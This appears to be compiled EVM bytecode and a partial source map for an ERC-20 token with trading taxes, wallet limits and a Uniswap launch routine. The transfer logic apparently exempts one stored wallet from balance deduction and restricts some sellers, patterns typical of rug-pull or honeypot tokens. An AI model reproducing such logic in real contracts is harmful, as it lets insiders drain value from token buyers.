0x608060405260043610610113575f3560e01c8063751039fc1161009d578063bd27d80d11610062578063bd27d80d146102f9578063bf9d77e01461030e578063c9567bf914610327578063d00bc0b61461033b578063dd62ed3e14610350575f80fd5b8063751039fc146102475780638da5cb5b1461025b57806395d89b411461028b578063a648ecb5146102bb578063a9059cbb146102da575f80fd5b8063313ce567116100e3578063313ce567146101b857806366a16a9a146101d357806366f906aa146101e857806370a08231146101fd578063715018a614610231575f80fd5b806306fdde031461011e578063095ea7b31461014857806318160ddd1461017757806323b872dd14610199575f80fd5b3661011a57005b5f80fd5b348015610129575f80fd5b50610132610394565b60405161013f91906114ae565b60405180910390f35b348015610153575f80fd5b50610167610162366004611510565b6103b7565b604051901515815260200161013f565b348015610182575f80fd5b5061018b6103cd565b60405190815260200161013f565b3480156101a4575f80fd5b506101676101b336600461153a565b6103ee565b3480156101c3575f80fd5b506040516009815260200161013f565b3480156101de575f80fd5b5061018b60085481565b3480156101f3575f80fd5b5061018b60075481565b348015610208575f80fd5b5061018b610217366004611578565b6001600160a01b03165f9081526001602052604090205490565b34801561023c575f80fd5b50610245610456565b005b348015610252575f80fd5b506102456104d0565b348015610266575f80fd5b505f546001600160a01b03165b6040516001600160a01b03909116815260200161013f565b348015610296575f80fd5b506040805180820190915260088152672227a3a2a1a7a4a760c11b6020820152610132565b3480156102c6575f80fd5b50601454610273906001600160a01b031681565b3480156102e5575f80fd5b506101676102f4366004611510565b61058e565b348015610304575f80fd5b5061018b600a5481565b348015610319575f80fd5b506006546101679060ff1681565b348015610332575f80fd5b5061024561059a565b348015610346575f80fd5b5061018b60095481565b34801561035b575f80fd5b5061018b61036a366004611593565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b606060405180610180016040528061015481526020016118866101549139905090565b5f6103c333848461094e565b5060015b92915050565b5f6103da6009600a6116be565b6103e9906409cb81ff406116cc565b905090565b5f6103fa848484610a71565b61044b84336104468560405180606001604052806028815260200161185e602891396001600160a01b038a165f908152600260209081526040808320338452909152902054919061113c565b61094e565b5060015b9392505050565b5f546001600160a01b031633146104885760405162461bcd60e51b815260040161047f906116e3565b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146104f95760405162461bcd60e51b815260040161047f906116e3565b6105056009600a6116be565b610514906409cb81ff406116cc565b6007556105236009600a6116be565b610532906409cb81ff406116cc565b6008556006805460ff191690557ffbbfe3a958a2de5d254d6837b63122e7a75e113758ea9a9a1cd0c9cde0f14dde61056c6009600a6116be565b61057b906409cb81ff406116cc565b60405190815260200160405180910390a1565b5f6103c3338484610a71565b5f546001600160a01b031633146105c35760405162461bcd60e51b815260040161047f906116e3565b601380546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d17905560155460ff600160a01b90910416156106445760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e000000000000000000604482015260640161047f565b6013546106719030906001600160a01b03166106626009600a6116be565b610446906409cb81ff406116cc565b60135f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106c1573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106e59190611718565b6001600160a01b031663c9c653963060135f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610744573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107689190611718565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156107b2573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107d69190611718565b601580546001600160a01b039283166001600160a01b03199091161790556013541663f305d719473061081d816001600160a01b03165f9081526001602052604090205490565b5f806108305f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610896573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906108bb9190611733565b505060155460135460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610910573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610934919061175e565b506015805462ff00ff60a01b19166201000160a01b179055565b6001600160a01b0383166109b05760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161047f565b6001600160a01b038216610a115760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161047f565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610ad55760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161047f565b6001600160a01b038216610b375760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161047f565b5f8111610b985760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b606482015260840161047f565b5f80546001600160a01b03858116911614801590610bc357505f546001600160a01b03848116911614155b15610ffd5760065460ff1615610c7f576013546001600160a01b03848116911614801590610bff57506015546001600160a01b03848116911614155b15610c7f57325f908152600560205260409020544311610c6d5760405162461bcd60e51b8152602060048201526024808201527f4f6e6c79206f6e65207472616e736665722070657220626c6f636b20616c6c6f6044820152633bb2b21760e11b606482015260840161047f565b325f9081526005602052604090204390555b6015546001600160a01b038581169116148015610caa57506013546001600160a01b03848116911614155b8015610cce57506001600160a01b0383165f9081526003602052604090205460ff16155b15610e1457600754821115610d1b5760405162461bcd60e51b815260206004820152601360248201527222bc31b2b2b239903a34329020b6b7bab73a1760691b604482015260640161047f565b60085482610d3d856001600160a01b03165f9081526001602052604090205490565b610d47919061177d565b1115610d955760405162461bcd60e51b815260206004820152601c60248201527f4578636565647320746865206d61782057616c6c65742053697a652e00000000604482015260640161047f565b6011546012541015610dac57823b15610dac575f80fd5b60128054905f610dbb83611790565b90915550506001600160a01b0383165f908152600460205260409020805460ff19166001179055600f54601254610e1191606491610e0b9110610e0057600b54610e04565b600d545b8590611174565b906111f2565b90505b6015546001600160a01b038481169116148015610e3a57506001600160a01b0384163014155b8015610e5e57506001600160a01b0384165f9081526003602052604090205460ff16155b15610f2a576007548211158015610e8f5750600a546014546001600160a01b03165f90815260016020526040902054105b610ed15760405162461bcd60e51b815260206004820152601360248201527222bc31b2b2b239903a34329020b6b7bab73a1760691b604482015260640161047f565b610ef66064610e0b60105460125411610eec57600c54610e04565b600e548590611174565b9050601154601254118015610f2257506001600160a01b0384165f9081526004602052604090205460ff165b610f2a575f80fd5b305f90815260016020526040902054601554600160a81b900460ff16158015610f6057506015546001600160a01b038581169116145b8015610f755750601554600160b01b900460ff165b8015610f82575060095481115b8015610f915750601154601254115b8015610fb557506001600160a01b0384165f9081526003602052604090205460ff16155b8015610fd957506001600160a01b0385165f9081526003602052604090205460ff16155b15610ffb57610ffb610ff684610ff184600a54611233565b611233565b611247565b505b801561107557305f9081526001602052604090205461101c90826113d0565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061106c9085815260200190565b60405180910390a35b6001600160a01b0384165f908152600160205260409020546110999085908461142e565b6001600160a01b0385165f908152600160205260409020556110dc6110be838361145e565b6001600160a01b0385165f90815260016020526040902054906113d0565b6001600160a01b038085165f8181526001602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef611125858561145e565b60405190815260200160405180910390a350505050565b5f818484111561115f5760405162461bcd60e51b815260040161047f91906114ae565b505f61116b84866117a8565b95945050505050565b5f825f0361118357505f6103c7565b5f61118e83856116cc565b90508261119b85836117bb565b1461044f5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b606482015260840161047f565b5f61044f83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611482565b5f818311611241578261044f565b50919050565b6015805460ff60a81b1916600160a81b17905580156113c057601554600160a01b900460ff16156113c0576040805160028082526060820183525f9260208301908036833701905050905030815f815181106112a5576112a56117da565b6001600160a01b03928316602091820292909201810191909152601354604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156112fc573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906113209190611718565b81600181518110611333576113336117da565b6001600160a01b039283166020918202929092010152601354611359913091168461094e565b60135460405163791ac94760e01b81526001600160a01b039091169063791ac947906113919085905f908690309042906004016117ee565b5f604051808303815f87803b1580156113a8575f80fd5b505af11580156113ba573d5f803e3d5ffd5b50505050505b506015805460ff60a81b19169055565b5f806113dc838561177d565b90508381101561044f5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161047f565b6014545f906001600160a01b039081169085160361144d57508161044f565b611457838361145e565b905061044f565b5f61044f83836040518060600160405280602381526020016119da6023913961113c565b5f81836114a25760405162461bcd60e51b815260040161047f91906114ae565b505f61116b84866117bb565b5f6020808352835180828501525f5b818110156114d9578581018301518582016040015282016114bd565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461150d575f80fd5b50565b5f8060408385031215611521575f80fd5b823561152c816114f9565b946020939093013593505050565b5f805f6060848603121561154c575f80fd5b8335611557816114f9565b92506020840135611567816114f9565b929592945050506040919091013590565b5f60208284031215611588575f80fd5b813561044f816114f9565b5f80604083850312156115a4575f80fd5b82356115af816114f9565b915060208301356115bf816114f9565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561161857815f19048211156115fe576115fe6115ca565b8085161561160b57918102915b93841c93908002906115e3565b509250929050565b5f8261162e575060016103c7565b8161163a57505f6103c7565b8160018114611650576002811461165a57611676565b60019150506103c7565b60ff84111561166b5761166b6115ca565b50506001821b6103c7565b5060208310610133831016604e8410600b8410161715611699575081810a6103c7565b6116a383836115de565b805f19048211156116b6576116b66115ca565b029392505050565b5f61044f60ff841683611620565b80820281158282048414176103c7576103c76115ca565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215611728575f80fd5b815161044f816114f9565b5f805f60608486031215611745575f80fd5b8351925060208401519150604084015190509250925092565b5f6020828403121561176e575f80fd5b8151801515811461044f575f80fd5b808201808211156103c7576103c76115ca565b5f600182016117a1576117a16115ca565b5060010190565b818103818111156103c7576103c76115ca565b5f826117d557634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b8181101561183c5784516001600160a01b031683529383019391830191600101611817565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365e29e96e29e96f09f9fa7e29e96e29e96e29e96e29e96f09f9fa7f09f9fa70ae29e96f09f9fa7f09f9fa8f09f9fa7e29e96e29e96f09f9fa7f09f9fa8f09f9fa70ae29e96f09f9fa7f09f9fa7f09f9fa7f09f9fa7f09f9fa7f09f9fa7f09f9fa8f09f9fa70ae29e96f09f9fa7f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa7f09f9fa70af09f9fa7f09f9fa8f09f94b3e2ac9cf09f9fa8f09f94b3e2ac9cf09f9fa8f09f9fa70af09f9fa7f09f9fa8f09f9fa8e2ac9bf09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa70af09f9fa7f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fabf09f9fa8f09f9fa8f09f9fa70af09f9fa7f09f9fa8f09f9fabf09f9fabf09f9fabf09f9fa8f09f9fa8f09f9fa8f09f9fa70ae29e96f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa7f09f9fa8f09f9fa70ae29e96e29e96f09f9fa7f09f9fa7f09f9fa7f09f9fa7536166654d6174683a205f79697375626d6d7472616374696f6e206f766572666c6f77a26469706673582212205e55120ad31da91b8e842070298a14f032227f0f7653aa35dae13d4fcc6415b364736f6c63430008140033

Deployed Bytecode Sourcemap

3974:8611:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6272:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7105:161;;;;;;;;;;-1:-1:-1;7105:161:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;7105:161:0;1023:187:1;6549:95:0;;;;;;;;;;;;;:::i;:::-;;;1361:25:1;;;1349:2;1334:18;6549:95:0;1215:177:1;7274:318:0;;;;;;;;;;-1:-1:-1;7274:318:0;;;;;:::i;:::-;;:::i;6458:83::-;;;;;;;;;;-1:-1:-1;6458:83:0;;4902:1;2000:36:1;;1988:2;1973:18;6458:83:0;1858:184:1;5049:57:0;;;;;;;;;;;;;;;;4985;;;;;;;;;;;;;;;;6652:119;;;;;;;;;;-1:-1:-1;6652:119:0;;;;;:::i;:::-;-1:-1:-1;;;;;6745:18:0;6718:7;6745:18;;;:9;:18;;;;;;;6652:119;3059:148;;;;;;;;;;;;;:::i;:::-;;11492:189;;;;;;;;;;;;;:::i;2845:79::-;;;;;;;;;;-1:-1:-1;2883:7:0;2910:6;-1:-1:-1;;;;;2910:6:0;2845:79;;;-1:-1:-1;;;;;2463:32:1;;;2445:51;;2433:2;2418:18;2845:79:0;2299:203:1;6363:87:0;;;;;;;;;;-1:-1:-1;6435:7:0;;;;;;;;;;;;-1:-1:-1;;;6435:7:0;;;;6363:87;;5614:76;;;;;;;;;;-1:-1:-1;5614:76:0;;;;-1:-1:-1;;;;;5614:76:0;;;6779:167;;;;;;;;;;-1:-1:-1;6779:167:0;;;;;:::i;:::-;;:::i;5186:55::-;;;;;;;;;;;;;;;;4370:33;;;;;;;;;;-1:-1:-1;4370:33:0;;;;;;;;11894:651;;;;;;;;;;;;;:::i;5113:66::-;;;;;;;;;;;;;;;;6954:143;;;;;;;;;;-1:-1:-1;6954:143:0;;;;;:::i;:::-;-1:-1:-1;;;;;7062:18:0;;;7035:7;7062:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;6954:143;6272:83;6309:13;6342:5;;;;;;;;;;;;;;;;;6335:12;;6272:83;:::o;7105:161::-;7180:4;7197:39;660:10;7220:7;7229:6;7197:8;:39::i;:::-;-1:-1:-1;7254:4:0;7105:161;;;;;:::o;6549:95::-;6602:7;4964:14;4902:1;4964:2;:14;:::i;:::-;4950:28;;:11;:28;:::i;:::-;6622:14;;6549:95;:::o;7274:318::-;7372:4;7389:36;7399:6;7407:9;7418:6;7389:9;:36::i;:::-;7436:126;7445:6;660:10;7467:94;7510:6;7467:94;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;7467:19:0;;;;;;:11;:19;;;;;;;;660:10;7467:33;;;;;;;;;;:42;:94::i;:::-;7436:8;:126::i;:::-;-1:-1:-1;7580:4:0;7274:318;;;;;;:::o;3059:148::-;2972:6;;-1:-1:-1;;;;;2972:6:0;660:10;2972:22;2964:67;;;;-1:-1:-1;;;2964:67:0;;;;;;;:::i;:::-;;;;;;;;;3166:1:::1;3150:6:::0;;3129:40:::1;::::0;-1:-1:-1;;;;;3150:6:0;;::::1;::::0;3129:40:::1;::::0;3166:1;;3129:40:::1;3197:1;3180:19:::0;;-1:-1:-1;;;;;;3180:19:0::1;::::0;;3059:148::o;11492:189::-;2972:6;;-1:-1:-1;;;;;2972:6:0;660:10;2972:22;2964:67;;;;-1:-1:-1;;;2964:67:0;;;;;;;:::i;:::-;4964:14:::1;4902:1;4964:2;:14;:::i;:::-;4950:28;::::0;:11:::1;:28;:::i;:::-;11545:12;:22:::0;4964:14:::1;4902:1;4964:2;:14;:::i;:::-;4950:28;::::0;:11:::1;:28;:::i;:::-;11578:12;:20:::0;11609:13:::1;:19:::0;;-1:-1:-1;;11609:19:0::1;::::0;;11644:29:::1;4964:14;4902:1;4964:2;:14;:::i;:::-;4950:28;::::0;:11:::1;:28;:::i;:::-;11644:29;::::0;1361:25:1;;;1349:2;1334:18;11644:29:0::1;;;;;;;11492:189::o:0;6779:167::-;6857:4;6874:42;660:10;6898:9;6909:6;6874:9;:42::i;11894:651::-;2972:6;;-1:-1:-1;;;;;2972:6:0;660:10;2972:22;2964:67;;;;-1:-1:-1;;;2964:67:0;;;;;;;:::i;:::-;11949:13:::1;:74:::0;;-1:-1:-1;;;;;;11949:74:0::1;11980:42;11949:74;::::0;;12043:11:::1;::::0;::::1;-1:-1:-1::0;;;12043:11:0;;::::1;;12042:12;12034:47;;;::::0;-1:-1:-1;;;12034:47:0;;5151:2:1;12034:47:0::1;::::0;::::1;5133:21:1::0;5190:2;5170:18;;;5163:30;5229:25;5209:18;;;5202:53;5272:18;;12034:47:0::1;4949:347:1::0;12034:47:0::1;12124:13;::::0;12092:56:::1;::::0;12109:4:::1;::::0;-1:-1:-1;;;;;12124:13:0::1;4964:14;4902:1;4964:2;:14;:::i;:::-;4950:28;::::0;:11:::1;:28;:::i;12092:56::-;12191:13;;;;;;;;;-1:-1:-1::0;;;;;12191:13:0::1;-1:-1:-1::0;;;;;12191:21:0::1;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;12173:53:0::1;;12235:4;12242:13;;;;;;;;;-1:-1:-1::0;;;;;12242:13:0::1;-1:-1:-1::0;;;;;12242:18:0::1;;:20;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;12173:90;::::0;-1:-1:-1;;;;;;12173:90:0::1;::::0;;;;;;-1:-1:-1;;;;;5787:15:1;;;12173:90:0::1;::::0;::::1;5769:34:1::0;5839:15;;5819:18;;;5812:43;5704:18;;12173:90:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;12159:11;:104:::0;;-1:-1:-1;;;;;12159:104:0;;::::1;-1:-1:-1::0;;;;;;12159:104:0;;::::1;;::::0;;12274:13:::1;::::0;::::1;:29;12311:21;12342:4;12348:24;12342:4:::0;-1:-1:-1;;;;;6745:18:0;6718:7;6745:18;;;:9;:18;;;;;;;6652:119;12348:24:::1;12373:1;12375::::0;12377:7:::1;2883::::0;2910:6;-1:-1:-1;;;;;2910:6:0;;2845:79;12377:7:::1;12274:127;::::0;::::1;::::0;;;-1:-1:-1;;;;;;12274:127:0;;;-1:-1:-1;;;;;6225:15:1;;;12274:127:0::1;::::0;::::1;6207:34:1::0;6257:18;;;6250:34;;;;6300:18;;;6293:34;;;;6343:18;;;6336:34;6407:15;;;6386:19;;;6379:44;12385:15:0::1;6439:19:1::0;;;6432:35;6141:19;;12274:127:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;12419:11:0::1;::::0;12448:13:::1;::::0;12412:67:::1;::::0;-1:-1:-1;;;12412:67:0;;-1:-1:-1;;;;;12448:13:0;;::::1;12412:67;::::0;::::1;6963:51:1::0;-1:-1:-1;;7030:18:1;;;7023:34;12419:11:0;::::1;::::0;-1:-1:-1;12412:27:0::1;::::0;6936:18:1;;12412:67:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;12490:11:0::1;:18:::0;;-1:-1:-1;;;;12519:18:0;-1:-1:-1;;;12519:18:0;;;11894:651::o;7600:335::-;-1:-1:-1;;;;;7693:19:0;;7685:68;;;;-1:-1:-1;;;7685:68:0;;7552:2:1;7685:68:0;;;7534:21:1;7591:2;7571:18;;;7564:30;7630:34;7610:18;;;7603:62;-1:-1:-1;;;7681:18:1;;;7674:34;7725:19;;7685:68:0;7350:400:1;7685:68:0;-1:-1:-1;;;;;7772:21:0;;7764:68;;;;-1:-1:-1;;;7764:68:0;;7957:2:1;7764:68:0;;;7939:21:1;7996:2;7976:18;;;7969:30;8035:34;8015:18;;;8008:62;-1:-1:-1;;;8086:18:1;;;8079:32;8128:19;;7764:68:0;7755:398:1;7764:68:0;-1:-1:-1;;;;;7843:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;7895:32;;1361:25:1;;;7895:32:0;;1334:18:1;7895:32:0;;;;;;;7600:335;;;:::o;7943:2655::-;-1:-1:-1;;;;;8031:18:0;;8023:68;;;;-1:-1:-1;;;8023:68:0;;8360:2:1;8023:68:0;;;8342:21:1;8399:2;8379:18;;;8372:30;8438:34;8418:18;;;8411:62;-1:-1:-1;;;8489:18:1;;;8482:35;8534:19;;8023:68:0;8158:401:1;8023:68:0;-1:-1:-1;;;;;8110:16:0;;8102:64;;;;-1:-1:-1;;;8102:64:0;;8766:2:1;8102:64:0;;;8748:21:1;8805:2;8785:18;;;8778:30;8844:34;8824:18;;;8817:62;-1:-1:-1;;;8895:18:1;;;8888:33;8938:19;;8102:64:0;8564:399:1;8102:64:0;8194:1;8185:6;:10;8177:64;;;;-1:-1:-1;;;8177:64:0;;9170:2:1;8177:64:0;;;9152:21:1;9209:2;9189:18;;;9182:30;9248:34;9228:18;;;9221:62;-1:-1:-1;;;9299:18:1;;;9292:39;9348:19;;8177:64:0;8968:405:1;8177:64:0;8252:17;2910:6;;-1:-1:-1;;;;;8286:15:0;;;2910:6;;8286:15;;;;:32;;-1:-1:-1;2883:7:0;2910:6;-1:-1:-1;;;;;8305:13:0;;;2910:6;;8305:13;;8286:32;8282:1938;;;8341:13;;;;8337:335;;;8393:13;;-1:-1:-1;;;;;8379:28:0;;;8393:13;;8379:28;;;;:58;;-1:-1:-1;8425:11:0;;-1:-1:-1;;;;;8411:26:0;;;8425:11;;8411:26;;8379:58;8375:282;;;8497:9;8468:39;;;;:28;:39;;;;;;8510:12;-1:-1:-1;8460:102:0;;;;-1:-1:-1;;;8460:102:0;;9580:2:1;8460:102:0;;;9562:21:1;9619:2;9599:18;;;9592:30;9658:34;9638:18;;;9631:62;-1:-1:-1;;;9709:18:1;;;9702:34;9753:19;;8460:102:0;9378:400:1;8460:102:0;8612:9;8583:39;;;;:28;:39;;;;;8625:12;8583:54;;8375:282;8700:11;;-1:-1:-1;;;;;8692:19:0;;;8700:11;;8692:19;:51;;;;-1:-1:-1;8729:13:0;;-1:-1:-1;;;;;8715:28:0;;;8729:13;;8715:28;;8692:51;:78;;;;-1:-1:-1;;;;;;8748:22:0;;;;;;:18;:22;;;;;;;;8747:23;8692:78;8688:551;;;8810:12;;8800:6;:22;;8792:54;;;;-1:-1:-1;;;8792:54:0;;9985:2:1;8792:54:0;;;9967:21:1;10024:2;10004:18;;;9997:30;-1:-1:-1;;;10043:18:1;;;10036:49;10102:18;;8792:54:0;9783:343:1;8792:54:0;8899:12;;8889:6;8873:13;8883:2;-1:-1:-1;;;;;6745:18:0;6718:7;6745:18;;;:9;:18;;;;;;;6652:119;8873:13;:22;;;;:::i;:::-;:38;;8865:79;;;;-1:-1:-1;;;8865:79:0;;10463:2:1;8865:79:0;;;10445:21:1;10502:2;10482:18;;;10475:30;10541;10521:18;;;10514:58;10589:18;;8865:79:0;10261:352:1;8865:79:0;8976:19;;8966:9;;:29;8963:100;;;11822:20;;11870:8;9017:26;;;;;;9081:9;:11;;;:9;:11;;;:::i;:::-;;;;-1:-1:-1;;;;;;;9094:14:0;;;;;;:10;:14;;;;;:19;;-1:-1:-1;;9094:19:0;9109:4;9094:19;;;9166:16;;9156:9;;9144:79;;9219:3;;9144:70;;-1:-1:-1;9155:58:0;;9198:15;;9155:58;;;9184:13;;9155:58;9144:6;;:10;:70::i;:::-;:74;;:79::i;:::-;9132:91;;8688:551;9264:11;;-1:-1:-1;;;;;9258:17:0;;;9264:11;;9258:17;:41;;;;-1:-1:-1;;;;;;9279:20:0;;9294:4;9279:20;;9258:41;:70;;;;-1:-1:-1;;;;;;9304:24:0;;;;;;:18;:24;;;;;;;;9303:25;9258:70;9255:396;;;9367:12;;9357:6;:22;;:64;;;;-1:-1:-1;9411:10:0;;9393:16;;-1:-1:-1;;;;;9393:16:0;6718:7;6745:18;;;:9;:18;;;;;;9383:38;9357:64;9349:96;;;;-1:-1:-1;;;9349:96:0;;9985:2:1;9349:96:0;;;9967:21:1;10024:2;10004:18;;;9997:30;-1:-1:-1;;;10043:18:1;;;10036:49;10102:18;;9349:96:0;9783:343:1;9349:96:0;9476:82;9554:3;9476:73;9498:17;;9488:9;;:27;9487:61;;9532:16;;9487:61;;;9517:14;;9476:6;;:10;:73::i;:82::-;9464:94;;9595:19;;9585:9;;:29;:49;;;;-1:-1:-1;;;;;;9618:16:0;;;;;;:10;:16;;;;;;;;9585:49;9577:58;;;;;;9716:4;9667:28;6745:18;;;:9;:18;;;;;;9742:6;;-1:-1:-1;;;9742:6:0;;;;9741:7;:42;;;;-1:-1:-1;9772:11:0;;-1:-1:-1;;;;;9766:17:0;;;9772:11;;9766:17;9741:42;:57;;;;-1:-1:-1;9787:11:0;;-1:-1:-1;;;9787:11:0;;;;9741:57;:103;;;;;9823:21;;9802:20;:42;9741:103;:150;;;;;9872:19;;9862:9;;:29;9741:150;:176;;;;-1:-1:-1;;;;;;9895:22:0;;;;;;:18;:22;;;;;;;;9894:23;9741:176;:205;;;;-1:-1:-1;;;;;;9922:24:0;;;;;;:18;:24;;;;;;;;9921:25;9741:205;9737:472;;;9981:73;9997:56;10005:6;10012:40;10020:20;10041:10;;10012:7;:40::i;:::-;9997:7;:56::i;:::-;9981:15;:73::i;:::-;8320:1900;8282:1938;10235:11;;10232:161;;10303:4;10285:24;;;;:9;:24;;;;;;:39;;10314:9;10285:28;:39::i;:::-;10278:4;10260:24;;;;:9;:24;;;;;;;:64;;;;10342:39;;-1:-1:-1;;;;;10342:39:0;;;;;;;10371:9;1361:25:1;;1349:2;1334:18;;1215:177;10342:39:0;;;;;;;;10232:161;-1:-1:-1;;;;;10434:15:0;;;;;;:9;:15;;;;;;10419:39;;10428:4;;10451:6;10419:8;:39::i;:::-;-1:-1:-1;;;;;10403:15:0;;;;;;:9;:15;;;;;:55;10483:45;10501:26;:6;10517:9;10501:15;:26::i;:::-;-1:-1:-1;;;;;10483:13:0;;;;;;:9;:13;;;;;;;:17;:45::i;:::-;-1:-1:-1;;;;;10469:13:0;;;;;;;:9;:13;;;;;:59;;;;10544:46;;;10563:26;:6;10579:9;10563:15;:26::i;:::-;10544:46;;1361:25:1;;;1349:2;1334:18;10544:46:0;;;;;;;8012:2586;7943:2655;;;:::o;1732:195::-;1823:7;1859:12;1851:6;;;;1843:29;;;;-1:-1:-1;;;1843:29:0;;;;;;;;:::i;:::-;-1:-1:-1;1883:9:0;1895:5;1899:1;1895;:5;:::i;:::-;1883:17;1732:195;-1:-1:-1;;;;;1732:195:0:o;1935:246::-;1993:7;2017:1;2022;2017:6;2013:47;;-1:-1:-1;2047:1:0;2040:8;;2013:47;2070:9;2082:5;2086:1;2082;:5;:::i;:::-;2070:17;-1:-1:-1;2115:1:0;2106:5;2110:1;2070:17;2106:5;:::i;:::-;:10;2098:56;;;;-1:-1:-1;;;2098:56:0;;11315:2:1;2098:56:0;;;11297:21:1;11354:2;11334:18;;;11327:30;11393:34;11373:18;;;11366:62;-1:-1:-1;;;11444:18:1;;;11437:31;11485:19;;2098:56:0;11113:397:1;2189:132:0;2247:7;2274:39;2278:1;2281;2274:39;;;;;;;;;;;;;;;;;:3;:39::i;11159:102::-;11220:7;11247:1;11245;:3;11244:9;;11252:1;11244:9;;;-1:-1:-1;11250:1:0;11159:102;-1:-1:-1;11159:102:0:o;10606:545::-;5920:6;:13;;-1:-1:-1;;;;5920:13:0;-1:-1:-1;;;5920:13:0;;;10680:27;;10699:7:::1;10680:27;10721:11;::::0;-1:-1:-1;;;10721:11:0;::::1;;;10717:25:::0;10734:7:::1;10717:25;10776:16;::::0;;10790:1:::1;10776:16:::0;;;;;::::1;::::0;;10752:21:::1;::::0;10776:16:::1;::::0;::::1;::::0;;::::1;::::0;::::1;;::::0;-1:-1:-1;10776:16:0::1;10752:40;;10821:4;10803;10808:1;10803:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;10803:23:0;;::::1;:7;::::0;;::::1;::::0;;;;;;:23;;;;10847:13:::1;::::0;:20:::1;::::0;;-1:-1:-1;;;10847:20:0;;;;:13;;;::::1;::::0;:18:::1;::::0;:20:::1;::::0;;::::1;::::0;10803:7;;10847:20;;;;;:13;:20:::1;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;10837:4;10842:1;10837:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;10837:30:0;;::::1;:7;::::0;;::::1;::::0;;;;;:30;10910:13:::1;::::0;10878:60:::1;::::0;10895:4:::1;::::0;10910:13:::1;10926:11:::0;10878:8:::1;:60::i;:::-;10949:13;::::0;:194:::1;::::0;